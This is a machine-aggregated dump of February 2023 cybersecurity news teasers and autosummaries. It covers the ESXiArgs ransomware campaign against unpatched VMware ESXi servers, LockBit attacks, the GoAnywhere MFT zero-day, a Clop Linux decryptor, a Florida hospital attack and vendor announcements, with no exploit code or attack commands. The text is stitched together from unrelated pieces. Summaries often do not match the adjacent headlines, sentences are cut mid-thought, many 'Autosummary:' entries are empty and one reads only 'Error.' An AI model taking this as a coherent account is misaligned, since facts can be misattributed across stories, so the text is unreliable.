The full list of file extensions encrypted by the malware is: vmdk , vmx , vmxf , vmsd , vmsn , vswp , vmss , nvram , vmem . See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.CISA and FBI encourage all organizations managing VMware ESXi servers to: The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.”Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. "Autosummary:
"A Russian national pleaded guilty in the U.S. to money laundering charges linked to the Ryuk ransomware operation. On February 7, 2023, Russian national Denis Mihaqlovic Dubnikov (30) pleaded guilty in the U.S. to one count of conspiracy to commit money laundering for the Ryuk ransomware operation. Denis Mihaqlovic Dubnikov, 30, was arrested in Amsterdam in November […]
The post Russian national pleads guilty to money laundering linked to Ryuk Ransomware operation appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Ryuk ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" Forum post leaking the data for Weee! Source: BleepingComputer The leaked database contains Weee! customers" first and last names, email addresses, phone numbers, device type (iOS/PC/Android), order notes, and other data the delivery platform uses. "Autosummary:
NIST also considered that the algorithm had withstood the test of time, having been developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research, and Radboud University, and winning the CAESAR cryptographic competition"s "lightweight encryption" category in 2019. "Autosummary:
"This backdoor permits the execution of any JavaScript acquired through HTTP, providing the attacker the power to both conceal and modify the exploit code at their discretion without undergoing the game mode verification process, which can be dangerous, and updating the entire custom game mode," Vojtěšek said. "A leading electrical engineering company in Russia, Elevel, has exposed its customers’ personally identifiable information (PII,) including full names and addresses. Original post at hxxps://cybernews.com/privacy/russian-e-commerce-giant-data-leak/ Founded in 1991, Elevel (previously Eleko) positions itself as the leading Russian electrical engineering company that runs both an e-commerce business and wholesale stores. On January 24, the Cybernews research […]
The post Russian e-commerce giant Elevel exposed buyers’ delivery addresses appeared first on Security Affairs.
"Autosummary:
"Categories: Ransomware Categories: Threat Intelligence Our Threat Intelligence team looks at known ransomware attacks by gang, country, and industry sector in January 2023, and looks at LockBit"s newest encryptor. |
The post Ransomware review: February 2023 appeared first on Malwarebytes Labs.
"Autosummary:
According to the DoJ, the Hive ransomware group has targeted over 1,500 victims in over 80 countries, including hospitals, school districts, financial firms, and critical infrastructure, attempting to extort hundreds of millions of dollars from victims in the United States and around the world. Known ransomware attacks by gang in January 2023 Known ransomware attacks by country in January 2023 Known ransomware attacks by industry sector in January 2023 While LockBit was plowing through the new year, however, there was nothing but radio silence from another notorious ransomware player: A post on the Dark Web by LockBit (translated from the original Russian) suggests the group is supplementing the ransomware ("lockers") it already sells, rather than replacing it: I have repeatedly said that I want to collect as many top lockers as possible in one panel, who have well-known and good sources lying around, write - I will buy. "Categories: News Tags: GoAnywhere MFT Tags: managed file transfer Tags: Kevin Beaumont Tags: Brian Krebs Tags: emergency patch 7.1.2 Tags: Fortra Tags: Cobalt Strike Tags: Florian Hauser Tags: Code White A bug in GoAnywhere, a B2B management file transfer software, could lead to a serious supply chain attack if left unpatched. Update now! |
The post Update now! GoAnywhere MFT zero-day patched appeared first on Malwarebytes Labs.
"Autosummary:
Brian Krebs of KrebsOnSecurity graciously shared what Fortra said in its advisory, which can only be accessed by creating a free account: "The attack vector of this exploit requires access to the administrative console of the application, which in most cases is accessible only from within a private company network, through VPN, or by allow-listed IP addresses (when running in cloud environments, such as Azure or AWS)." "Categories: News Categories: Ransomware Tags: LockBit Tags: ransomware Tags: LockBit ransomware group Tags: FBI Tags: Todd Conklin Tags: Financial Conduct Authority Tags: FCA Tags: Tags: Prudential Regulation Authority Tags: PRA Tags: Tom Kellermann Tags: Joseph Schifano Pernicious ransomware group, LockBit, is making headlines again. Less than a month after attacking HACLA, it hit the derivatives trading division of ION Group, a financial software company. |
The post ION starts bringing customers back online after LockBit ransomware attack appeared first on Malwarebytes Labs.
"Autosummary:
The ION Group leak site post (Source: Malwarebytes) On Friday, February 4, the ransomware group claimed the ransom had been paid, with Reuters quoting the attackers as saying the money was paid by a "very rich unknown philanthropist". Malwarebytes Endpoint Detection and Response offers built-in ransomware protection, 72-hour ransomware rollback, and zero-day ransomware protection. The subsidiary, ION Cleared Derivatives, which offers software for automating the trading cycle and the clearing process for derivatives, released a very short statement regarding the "cybersecurity event" on Tuesday. "Nozomi Networks and Industrial Defender have unveiled a strategic partnership to enhance the security of critical infrastructure and manufacturing facilities. The companies’ joint solution combines asset visibility and threat detection capabilities from Nozomi Networks with change and configuration monitoring from Industrial Defender to provide the most complete and detailed view of OT assets and behavior in the industry. “Collaborating with industry leaders is essential for effectively defending against the growing cyber threats against operational technology. … More
The post Industrial Defender and Nozomi Networks partner to protect critical operational technology appeared first on Help Net Security.
"Autosummary:
"Tensions between two of the biggest producers of connected (IoT) devices are coming to a head, and will be changing the IoT landscape in 2023. In recent months, India and China have faced off over their disputed border in the Himalayas. The military stand-off mirrors growing tech conflict between the two superpowers. In a relationship increasingly marked by diplomatic disputes and trade rivalry, India and China are now competing for the Internet of Things (IoT). … More
The post India-China relations will define the IoT landscape in 2023 appeared first on Help Net Security.
"Autosummary:
In my view, the country is only set to grow in IoT. They are more democratic, count fewer language barriers and have a young, tech-savvy populace – the perfect conditions for economic golden years.At a minimum, devices must count encrypted, direct communications, and cybersecurity leaders should review device origin in any onboarding process.China, on the other hand, is coming out of the pandemic and keen to continue its tech bull run, so we cannot expect them to go down without a fight. "All businesses seek profitable growth. The issue is that growth adds complexity. Organizations need new systems and more employees to support this larger footprint, thus expanding the number of potential points of failure. This means more financial and reputation risks going forward – especially as organizations grow their digital presence. To balance out these unintended consequences of growth, organizations need to have a cybersecurity strategy and the necessary tools to implement it. Many already realize … More
The post How to scale cybersecurity for your business appeared first on Help Net Security.
"Autosummary:
“You also have to ‘prove’ to multiple parties that you have ‘done the right thing’ from their perspective, like PCI, ISO, the legal system, regulators, insurance companies, etc. Dispense with ad hoc responses to security incidents – Many organizations are choosing to scale their cybersecurity in response to trends such as remote work, cloud migration, and/or new data privacy regulations – that is, developments that aren’t going away anytime soon. The benefits of cybersecurity scaling Sean Atkinson, CISO at CIS, explained that cybersecurity scaling helps organizations prevent profitable growth from spiraling out of control. "Autosummary:
The files and folders it targets include the user"s "/home" directory, which contains all personal files, the "/root" directory, "/opt," and Oracle directories ("/u01" - "/u04") used for storing database files or as mount points for Oracle software. "Autosummary:
Royal Mail entry on LockBit"s data leak site (BleepingComputer) Attack described as a "cyber incident" Royal Mail first detected the attack on January 10 and hired outside forensic experts to help with the investigation. "Autosummary:
Dozens of instances exposed online, mitigation also available In a Saturday update to its advisory, Fortra explained that "the attack vector of this exploit requires access to the administrative console of the application, which in most cases is accessible only from within a private company network, through VPN, or by allow-listed IP addresses (when running in cloud environments, such as Azure or AWS). "The popular collective Anonymous has leaked 128 GB of data allegedly stolen from the Russian Internet Service Provider Convex. The collective Anonymous released last week 128 gigabytes of documents that were allegedly stolen from the Russian Internet Service Provider Convex. The huge trove of data was leased by an affiliate of Anonymous’s affiliate group called […]
The post Anonymous leaked 128GB of data stolen from Russian ISP Convex revealing FSB’s warrantless surveillance appeared first on Security Affairs.
"Autosummary:
#Anonymous #OpRussia https://t.co/Q2DwUb3t3c, hacked they provide telecom services in #Russia, internet/telephone/cable Government, business Green Atom project exposed and used for spying on Internet/telephone traffic under an agreement with the FSS Credit- CAXXII#Ukraine pic.twitter.com/DTxNfa5Mpl — Anonymous Operations (@AnonOpsSE) January 31, 2023 Such surveillance activities are classified as unauthorized wiretapping, espionage, and warrantless surveillance of civilians, which are against the country’s laws. "Flawed encryption logic used in Cl0p (Clop) ransomware’s Linux (ELF) variant has allowed SentinelOne researchers to create and release a free decryptor. “The [Cl0p] Windows variant encrypts the generated RC4 key responsible for the file encryption using the asymmetric algorithm RSA and a public key. In the Linux variant, the generated RC4 key is encrypted with a RC4 [hardcoded] ‘master-key’,” the researchers explained. The differences between Windows and Linux variants The Linux Cl0p variant is … More
The post Released: Decryptor for Cl0p ransomware’s Linux variant appeared first on Help Net Security.
"Autosummary:
“While the Linux-flavored variation of Cl0p is, at this time, in its infancy, its development and the almost ubiquitous use of Linux in servers and cloud workloads suggests that defenders should expect to see more Linux-targeted ransomware campaigns going forward.” "Autosummary:
"Autosummary:
"Autosummary:
"The maintainers of OpenSSH address multiple security issues, including a memory safety bug in the OpenSSH server (sshd). The maintainers of OpenSSH have addressed a number of security vulnerabilities with the release of version 9.2. One of the issues addressed by the maintainers is a memory safety bug in the OpenSSH server (sshd) tracked as […]
The post OpenSSH addressed a new pre-auth double free vulnerability appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, encryption) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The conspirators, including Dubnikov, used various financial transactions, including international ones, to hide the origin, location, and identity of those who received the ransom payments. "Autosummary:
Filetypes targeted by Medusa (Cyble) Valid files are encrypted using AES 256-bit encryption, and the .medusastealer extension is appended to the encrypted files" name The malware"s ransomware function (Cyble) However, the encryption method appears broken, turning the ransomware into a data wiper. "VMware said there is no evidence that threat actors are exploiting a zero-day flaw in its software as part of an ongoing ESXiArgs ransomware campaign. VMware said that it found no evidence that the threat actors behind the ongoing ESXiArgs ransomware attacks are leveraging a zero-day vulnerability in VMware ESXi servers. “VMware has not found evidence […]
The post VMware has no evidence of zero-day exploitation in ESXiArgs ransomware attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, VMware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
The QakNote campaign In the new report by Sophos, security researcher Andrew Brandt explains that QBot"s operators have started experimenting with this new distribution method since January 31, 2023, using OneNote files that contain an embedded HTML application (HTA file) that retrieves the QBot malware payload. "Autosummary:
"Categories: Business See how our new offering Malwarebytes Security for Business helps you crush mobile malware and phishing attacks. |
The post Introducing Malwarebytes Mobile Security for Business: How to find malware and stop phishing attacks on smartphones and ChromeOS appeared first on Malwarebytes Labs.
"Autosummary:
Mobile Devices and Chromebooks: The Cybersecurity Gap Whether employer-provided or employee- or student-owned, mobile devices and Chromebooks are tempting targets for malicious threat actors—yet, these mobile devices remain woefully under-protected. To that end, there are two ways to activate the endpoint agent for your mobile devices: Email (self-activation by end users) and via Mobile Device Management (MDM). "Categories: News Categories: Ransomware Tags: Tallahassee Memorial Tags: TMH Tags: Mark O’Bryant Tags: Max Henderson Tags: Atlantic General Hospital Tags: ransomware Tags: healthcare ransomware attack Tallahassee Memorial in Florida has reportedly been hit by a ransomware attack. |
The post Florida hospital takes entire IT systems offline after "ransomware attack" appeared first on Malwarebytes Labs.
"Autosummary:
We will also post updates on https://t.co/UGsradFUmG pic.twitter.com/MhQmM67l6b — Tallahassee Memorial (@TMHFORLIFE) February 3, 2023 Tallahassee Memorial"s official Twitter account said in a statement on Friday: "We are reviewing each of our IT systems now, prioritizing them and bringing them back online one-by-one. Malwarebytes Endpoint Detection and Response offers built-in ransomware protection, 72-hour ransomware rollback, and zero-day ransomware protection. Tallahassee Memorial Healthcare (TMH), a major hospital system in northern Florida, has reportedly been experiencing an "IT security issue" since Thursday evening, which impacted some of its IT systems. "A new Linux variant of the Clop ransomware has been observed in the wild, the good news is that its encryption algorithm is flawed. SentinelLabs researchers have observed the first Linux variant of the Clop ransomware. The researchers noticed that the encryption algorithm implemented in the ELF executable is flawed and can allow victims to […]
The post New Linux variant of Clop Ransomware uses a flawed encryption algorithm appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Government agencies keep making new privacy rules while end users fall victim to malpractice and scams. Bill Tolson, VP of Compliance and eDiscovery at Archive360, has spent many years consulting with regulators and advising businesses on concrete steps to enhance data privacy. In this Help Net Security interview, he discusses how organizations should ensure privacy is built into the design process, cybersecurity investments for better privacy, and much more. What practical steps should companies follow … More
The post While governments pass privacy laws, companies struggle to change appeared first on Help Net Security.
"Autosummary:
A breach is arguably different: While consumer data is compromised, the organizations take a big hit, too, including individual lawsuits, brand damage, loss in shareholder equity, and a decrease in business.Moreover, organizations are required to capture, index, secure, and dispose of all PII based on differing state, federal, and foreign data privacy laws.In all cases, technologies and processes must be designed to encompass all data, with processes built-in early to simplify capture, scanning, retention, search, and retrieval.In certain situations, it’s also possible to deploy software for particular functions inside an isolated environment, which helps ensure network security, scalability, storage accounts, access controls and more. "Resecurity has identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors behind this new project have an affiliate platform first introduced on the RAMP underground community, which is known for initial access brokers (IABs) and other cybercriminal actors and ransomware groups. Around February 1, 2023 – the group distributed an updated locker written in Rust for their affiliates supporting Windows, Linux and … More
The post Nevada Ransomware has released upgraded locker appeared first on Help Net Security.
"Autosummary:
Around February 1, 2023 – the group distributed an updated locker written in Rust for their affiliates supporting Windows, Linux and ESXi – this programming language has become a trend for ransomware developers these days (Blackcat, RansomExx2, Hive, Luna, Agenda). "Autosummary:
"Autosummary:
"VSTO add-ins can be packaged alongside Office documents (Local VSTO), or, alternatively, fetched from a remote location when a VSTO-Bearing Office document is opened (Remote VSTO)," Deep Instinct disclosed last week. "The Italian National Cybersecurity Agency (ACN) warns of an ongoing massive ransomware campaign targeting VMware ESXi servers. The Italian National Cybersecurity Agency (ACN) warns of an ongoing massive ransomware campaign targeting VMware ESXi servers worldwide, including Italian systems. The attackers are attempting to exploit the CVE-2021–21974 vulnerability. According to the ACN, most of the attacks […]
The post Italian National Cybersecurity Agency (ACN) warns of massive ransomware campaign targeting VMware ESXi servers appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CVE-2021–21974) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnThe vulnerability affects the following systems: ESXi 7.x versions earlier than ESXi70U1c-17325551 ESXi versions 6.7.x earlier than ESXi670-202102401-SG ESXi versions 6.5.x earlier than ESXi650-202102101-SG The virtualization giant addressed the CVE-2021-21974 bug in February 2021. "Late last week, unknown attackers launched a widespread ransomware attack hitting VMware ESXi hypervisors via CVE-2021-21974, an easily exploitable vulnerability that allows them to run exploit code remotely, without prior authentication. Patches for CVE-2021-21974, a vulnerability in ESXi’s OpenSLP service, have been provided by VMware two years ago, and this attack has revealed just how many servers are out there are still unpatched, with the SLP service still running and the OpenSLP port (427) still … More
The post Thousands of unpatched VMware ESXi servers hit by ransomware via old bug (CVE-2021-21974) appeared first on Help Net Security.
"Autosummary:
After some initial speculation about the ransomware the attackers use to encrypt vulnerable servers, it has been confirmed that it’s a new ransomware family that has been dubbed ESXiArgs due to the targeted systems and the extension (.args) added to the encrypted virtual machines files (files with the .vmdk, .vmx, .vmxf, .vmsd, .vmsn, .vswp, .vmss, .nvram, and .vmem extensions). "Autosummary:
"Autosummary:
"Royal Ransomware operators added support for encrypting Linux devices and target VMware ESXi virtual machines. The Royal Ransomware gang is the latest extortion group in order of time to add support for encrypting Linux devices and target VMware ESXi virtual machines. Other ransomware operators already support Linux encrypting, including AvosLocker, Black Basta, BlackMatter, HelloKitty, Hive, […]
The post Royal Ransomware adds support for encrypting Linux, VMware ESXi systems appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "U2opia licensed two technologies from the Department of Energy’s Oak Ridge National Laboratory that offer a new method for advanced cybersecurity monitoring in real time. “Identifying and quickly responding to attempted cybersecurity attacks is an urgent need across government and industry,” said Susan Hubbard, deputy for science and technology at ORNL. “ORNL’s leadership in cyber resilience has led to the development of two powerful tools that will enable a more secure cyber environment.” The licensing … More
The post U2opia licenses ORNL technologies for cybersecurity monitoring in real time appeared first on Help Net Security.
"Autosummary:
Over the last 23 years, Smith’s information technology solutions company, GCS, based near New Orleans in Harvey, Louisiana, has successfully executed multiple assignments on behalf of the U.S. Navy, Army and Air Force; the Department of Agriculture; the Department of Homeland Security, or DHS; and NASA. "ESXi ransomware targeted thousands of VMware servers in a global-scale campaign, security experts and international CERTs warn. Thousands of computer servers have been targeted by a global ransomware hacking attack targeting VMware (VMW.N) ESXi servers. ESXi is VMware’s hypervisor, a technology that allows organizations to host several virtualized computers running multiple operating systems on a […]
The post Italy, France and Singapore Warn of a Spike in ESXI Ransomware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ESXi ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Map of vulnerable GoAnywhere MFT servers (Shodan) Mitigation available The company is yet to publicly acknowledge this remote pre-authentication RCE security flaw exploited in attacks (to read the advisory, you need to create a free account first) and hasn"t released security updates to address the vulnerability, thus leaving all exposed installations vulnerable to attacks. "Categories: Exploits and vulnerabilities Categories: News Categories: Ransomware Tags: VMware Tags: ESXi Tags: Nevada Tags: ransomware Tags: Linux Tags: CVE-2021-21974 Over the weekend, several CERTs warned about ongoing ransomware attacks against unpatched VMware ESXi virtual machines. |
The post Two year old vulnerability used in ransomware attack against VMware ESXi appeared first on Malwarebytes Labs.
"Autosummary:
The fixed versions are: For ESXi 7.0: ESXi70U1c-17325551 or later For ESXi 6.7: ESXi670-202102401-SG or later For ESXi 6.5: ESXi650-202102101-SG or later For Cloud Foundation (ESXi) 4.x: 4.2 or later For Cloud Foundation (ESXi) 3.x: please refer to VMware KB82705 A recommended workaround if you are not using the OpenSLP service in ESXi is to disable the SLP service on VMware ESXi.The threat actor runs an encryption process which is specifically targeting virtual machines files (“.vmdk”, “.vmx”, “.vmxf”, “.vmsd”, “.vmsn”, “.vswp”, “.vmss”, “.nvram”,”*.vmem”). "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Mounting cybersecurity pressure is creating headaches in railway boardrooms In this Help Net Security interview, Dimitri van Zantvliet is the Cybersecurity Director/CISO of Dutch Railways, and co-chair to the Dutch and European Rail ISAC, talks about cyber attacks on railway systems, build a practical cybersecurity approach, as well as cyber legislation. Critical OpenEMR vulnerabilities may allow attackers to access patients’ … More
The post Week in review: Rail transport cybersecurity, “verified” OAuth apps used to infiltrate organizations appeared first on Help Net Security.
"Autosummary:
Photos: Cybertech Tel Aviv 2023, part 2 Here are a few photos from the event, featured vendors include: DarkOwl, ThriveDX, Minerva Labs, Astrix Security, Ox Security, Waterfall Security, Cynet, Cyber 2.0, Acronis, CyberArk, Israel Aerospace Industries, SafeBreach, Silverfort, CYREBRO Video walkthrough: Cybertech Tel Aviv 2023 The vendors featured in this video are: BeyondTrust, Chainalysis, Check Point, Cisco, Commvault, Cyber 2.0, CyberArk, Cyberbit, Cynet, CYREBRO, Dart, Delinea, Deloitte, Dig, HCLSoftware, Hudson Rock, IBM, Imperva, Israel Aerospace Industries, KELA, Minerva Labs, Orca Security, Ox Security, Pentera, Resec, Rockwell Automation, SafeBreach, Semperis, Snyk, Sonatype, Synopsys, Tenable, ThetaRay, ThriveDX, Waterfall Security Solutions, Wing Security, and XM Cyber. Photos: Cybertech Tel Aviv 2023 Here are a few photos from the event, featured vendors include: Orca, Wise Elite Cyber Solutions, XM Cyber, Check Point, Semperis, CyCube, Mazebolt, IBM Security, bfore.ai, Delinea, Wing Security. "Autosummary:
BleepingComputer has been reporting on similar Linux ransomware encryptors released by multiple other gangs, including Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, and Hive. "Autosummary:
Finally, we learned more about ransomware attacks conducted this week and in the past, including: Contributors and those who provided new ransomware information and stories this week include @PolarToffee, @serghei, @fwosar, @BleepinComputer, @LawrenceAbrams, @Seifreed, @Ionut_Ilascu, @malwrhunterteam, @struppigel, @demonslay335, @billtoulas, @vxunderground, @GeeksCyber, @PRODAFT, @brkalbyrk7, @RESecurity, @MsftSecIntel, @1ZRR4H, @pcrisk, @BrettCallow, @ahnlab, @jgreigj, and @k7computing. February 2nd 2023 The LockBit ransomware gang has claimed responsibility for the cyberattack on ION Group, a UK-based software company whose products are used by financial institutions, banks, and corporations for trading, investment management, and market analytics. "Autosummary:
"Autosummary:
"Autosummary:
"The Tallahassee Memorial HealthCare (TMH) hospital in Florida was forced to take offline its systems after a cyberattack. The Tallahassee Memorial HealthCare (TMH) hospital has taken its IT systems offline and suspended non-emergency procedures after a cyberattack. The attack took place on Thursday, the cyberattack hit some of the systems at the hospital. The Tallahassee […]
The post Tallahassee Memorial HealthCare, Florida, has taken IT systems offline after cyberattack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The web inject modules, mainly used for harvesting credentials and sensitive data, are designed to single out banking, mobile payment services, cryptocurrency exchanges, and mobile e-commerce applications spanning Asia, Europe, Middle East, and the Americas. "A new wave of ransomware attacks is targeting VMware ESXi servers to deliver ransomware, CERT of France warns. The French Computer Emergency Response Team (CERT-FR) warns that threat actors are targeting VMware ESXi servers to deploy ransomware. CERT-FR reported that threat actors behind these ransomware attackers are actively exploiting the vulnerability CVE-2021-21974. “OpenSLP as used […]
The post CERT-FR warns of a new wave of ransomware attacks targeting VMware ESXi servers appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, VMware ESXi servers) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Threat actors are actively exploiting a zero-day vulnerability affecting Fortra’s GoAnywhere MFT managed file transfer application. Experts warn that threat actors are actively exploiting a zero-day vulnerability in Fortra’s GoAnywhere MFT managed file transfer application. The popular investigator Brian Krebs first revealed details about the zero-day on Mastodon and pointed out that Fortra has yet […]
The post GoAnywhere MFT zero-day flaw actively exploited appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, GoAnywhere MFT) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "US CISA added actively exploited vulnerabilities in SugarCRM and Oracle products to its Known Exploited Vulnerabilities Catalog. The Cybersecurity and Infrastructure Security Agency (CISA) added Oracle and SugarCRM flaws, respectively tracked as CVE-2022-21587 and CVE-2023-22952, to its Known Exploited Vulnerabilities Catalog. The CVE-2022-21587 flaw (CVSS score 9.8) affects the Oracle E-Business Suite, which is a set […]
The post CISA adds Oracle, SugarCRM bugs to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Error. "Autosummary:
Abusing Google search ads Over the past month, researchers have seen increased abuse of Google search ads to distribute various malware, including RedLine Stealer, Gozi/Ursnif, Vidar, Rhadamanthys stealer, IcedID, Raccoon Stealer, and many more. "Autosummary:
"Autosummary:
"Russia-linked threat actor Gamaredon employed new spyware in cyber attacks aimed at public authorities and critical information infrastructure in Ukraine. The State Cyber Protection Centre (SCPC) of Ukraine warns of a new wave of targeted attacks conducted by the Russia-linked APT group Gamaredon (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa). The attacks aimed at public authorities and critical information […]
The post Russia-linked Gamaredon APT targets Ukrainian authorities with new malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Gamaredon) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Cisco fixed a high-severity flaw in the IOx application hosting environment that can be exploited in command injection attacks. Cisco has released security updates to address a command injection vulnerability, tracked as CVE-2023-20076, in the Cisco IOx application hosting environment. “A vulnerability in the Cisco IOx application hosting environment could allow an authenticated, remote attacker […]
The post Cisco fixed command injection bug in IOx Application Hosting Environment appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"VMware addressed a high-severity privilege escalation vulnerability, tracked as CVE-2023-20854, in VMware Workstation. VMware fixed a high-severity privilege escalation flaw, tracked as CVE-2023-20854, that impacts Workstation. An attacker can exploit the vulnerability to delete arbitrary files on Workstation version 17.x for Windows OS. “An arbitrary file deletion vulnerability in VMware Workstation was privately reported to VMware. Updates are […]
The post VMware Workstation update fixes an arbitrary file deletion bug appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, privilege escalation) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Atlassian fixed a critical flaw in Jira Service Management Server and Data Center that can allow an attacker to impersonate another user and gain access to a Jira Service Management instance. Atlassian has released security updates to address a critical vulnerability in Jira Service Management Server and Data Center, tracked as CVE-2023-22501 (CVSS score: 9.4), […]
The post Atlassian fixed critical authentication vulnerability in Jira Software appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Throughout last year, the federal government has warned about ransomware operations known for actively targeting healthcare organizations across the U.S. For instance, the U.S. Department of Health and Human Services (HHS) warned of the Royal. "Autosummary:
BleepingComputer has identified local governments, healthcare companies, banks, energy firms, financial services companies, museums, and computer part manufacturers utilizing the GoAnywhere file transfer solution. "Autosummary:
Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook. "Autosummary:
Compromised ESXi servers worldwide (Shodan) New ESXiArgs ransomware However, from the ransom notes seen in this attack, they do not appear to be related to the Nevada Ransomware, and appear to be from a new ransomware family. "Threat actors started exploiting a critical Oracle E-Business Suite flaw, tracked as CVE-2022-21587, shortly after a PoC was published. Shadowserver researchers warn that threat actors have started attempting to exploit critical Oracle E-Business Suite flaw (CVE-2022-21587) shortly after a PoC was published. The E-Business Suite is a set of enterprise applications that allows organizations automate […]
The post Exploitation attempts for Oracle E-Business Suite flaw observed after PoC release appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"We learned recently that a list, including name, email, telephone number in some instances, as well as securely encrypted passwords and expired and inactive password reset tokens, of TruthFinder subscribers was being discussed and made available in an online forum," reads the data security incident notices. "Categories: Business Categories: News Tags: Financials Tags: fraud Tags: cybersecurity Tags: cooperation Tags: NatWest Tags: romance scam Tags: BEC scam Tags: NCP fraud Reports published about the UK financial industry show a growing number of cyberthreats and enormous losses to fraud. |
The post Cyberthreats facing UK finance sector "a national security threat" appeared first on Malwarebytes Labs.
"Autosummary:
Stuart Skinner, head of fraud protection at NatWest, said: We are committed to helping our customers stay safe and secure and are continuously investing in new fraud prevention tools and the latest security technology. Consumers The main types of fraud targeting consumers were: Authorized push payment (APP) scams, which use social engineering that tricks victims into authorizing payments to accounts belonging to the scammer.Remote card purchases, lost and stolen cards, cards that aren"t received, counterfeit cards, and card ID theft. "Categories: News Tags: ransomware Tags: malwarebytes Tags: youtube Tags: video Tags: multi-threat Tags: single threat Tags: double threat Tags: triple threat Tags: encrypt Tags: extortion Take a look at our ten minute video walkthrough of ransomware issues and concerns. |
The post The rise of multi-threat ransomware appeared first on Malwarebytes Labs.
"Autosummary:
"Hornetsecurity launched two new tools – the QR Code Analyzer and Secure Links – to combat growing cyber threats. These launches come in response to a rise in fake QR codes and the ongoing threat of phishing, which represents 40% of all cyber threats. Hornetsecurity has also released a new automated mailbox migration solution, which helps partners efficiently and securely deploy and operate Microsoft 365 in the cloud for their customers – and remain safe … More
The post Hornetsecurity unveils two tools to counter rise in phishing attacks and malicious links appeared first on Help Net Security.
"Autosummary:
Hornetsecurity COO, Daniel Blank added: “Hornetsecurity has listened to our partners’ needs, which has led to the launch of our efficient and safe Mailbox Migration Tool, at the same time as our new partner program is rolled out. "Autosummary:
"Autosummary:
Actionable - there must be actions the organization can take to defeat the threat - there must be actions the organization can take to defeat the threat Cost Effective - the cost of the threat must be greater than the cost of remediation This new framework brings a must-needed shift from looking at cybersecurity as strictly a technical problem, to a new mindset where cybersecurity is viewed as a business challenge that must be addressed in an efficient and cost-effective manner. Impactful threat intelligence must have 4 properties: Accurate - the intelligence must be true and accurate - the intelligence must be true and accurate Relevant - the intelligence must be relevant to the organization - the intelligence must be relevant to the organization "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The advanced persistent threat, also known as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and UAC-0010, has a track record of striking Ukrainian entities dating as far back as 2013. "Autosummary:
" Social engineering: Attackers also find success exploiting human weakness by social engineering someone to hand over credentials Once this requirement is fulfilled, attackers can exploit CVE-2023-20076 for "unrestricted access, allowing malicious code to lurk in the system and persist across reboots and firmware upgrades," as the researchers explained. "Autosummary:
